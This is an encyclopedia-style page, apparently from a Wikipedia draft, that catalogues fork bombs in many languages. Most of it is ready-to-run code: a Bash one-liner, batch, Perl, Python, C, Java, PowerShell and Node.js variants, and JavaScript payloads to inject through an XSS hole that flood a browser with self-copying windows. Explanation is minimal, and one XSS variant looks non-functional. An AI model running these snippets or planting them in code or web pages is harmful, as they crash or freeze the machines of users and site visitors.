Examples of fork bombs
This page lists some examples of fork bombs in different programming languages.
Examples
Bash
:(){ :|:& };:
The trick here is that : is a function name — otherwise it is identical to bomb() { bomb | bomb & }; bomb.
Same as above, but encoded into a standalone shell script as opposed to a shell function:
#!/bin/bash
./$0|./$0&
Windows batch
:s
start "" %0
goto s
The same as above, but shorter:
%0|%0
Combining the two:
:s
start "" %0
%0|%0
goto s
The same as above, but done in command line using ^ to escape specials:
echo %0^|%0 > forkbomb.bat
forkbomb.bat
Perl
An inline shell example using the Perl interpreter:
perl -e "fork while fork" &
PHP
<?php
while(true) {
pcntl_fork();
}
?>
Python
import os
while 1:
os.fork()
Java
public class ForkBomb {
public static void main(String[] args) {
while(true) {
Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});
}
}
}
Ruby
loop {
fork {
load(__FILE__)
}
}
Haskell
import Control.Monad (forever)
import System.Posix.Process (forkProcess)
forkBomb = forever $ forkProcess forkBomb
main = forkBomb
Common Lisp (Clozure CL)
(loop (#_fork))
C
#include <unistd.h>
int main(void) {
while(1) {
fork(); /* malloc can be used in order to increase the data usage */
}
}
C++
#include <unistd.h>
int main(void) {
while(1)
fork();
return 0;
}
C# (.NET)
static void Main() {
while (true) Process.Start(Assembly.GetExecutingAssembly().Location);
}
Visual Basic .NET
Do
System.Diagnostics.Process.Start(System.Reflection.Assembly.GetExecutingAssembly().Location)
Loop While True
Assembly (Netwide Assembler code for Linux running on a IA-32 CPU)
section .text
global _start
_start:
mov eax,2 ;System call for forking
int 0x80 ;Call kernel
jmp _start
PowerShell
while($true) {
Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:";
Invoke-Expression -Command 'while($true) {Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:"}';}
JavaScript
JavaScript code can be injected into a web page via an XSS vulnerability exploit, resulting in a series of infinitely forking pop-up windows:
while (true) {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}
Or, an easier-to-inject, harder-to-censor version of the above that uses an event spoofing attack:
<a href="#" onload="function() {while (true) {var w = window.open(); w.document.write(document.documentElement.outerHTML || document.documentElement.innerHTML);}}">XSS fork bomb</a>
Or, a more aggressive version:
setInterval(function() {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}, 10);
Node.js, using JavaScript
(function f() {require('child_process').spawn(process.argv[0], ['-e', '(' + f.toString() + '());']);}());
This can also be run using shell, similar to approach it uses inside:
node -e "(function f() {require('child_process').spawn(process.argv[0], ['-e', '(' + f.toString() + '());']);}());"
See also
External links
- Understanding Bash fork() Bomb ~ :(){ :|:& };: — nixCraft
- Fork Bomb — HACKAGON
- A fork bomb in multiple languages! — SRL Forums
- A collection of fork bombs in various programming languages — Andrew Pennebaker (GitHub)
This article "Examples of fork bombs" is from Wikipedia. The list of its authors can be seen in its historical. Articles copied from Draft Namespace on Wikipedia could be seen on the Draft Namespace of Wikipedia and not main one.
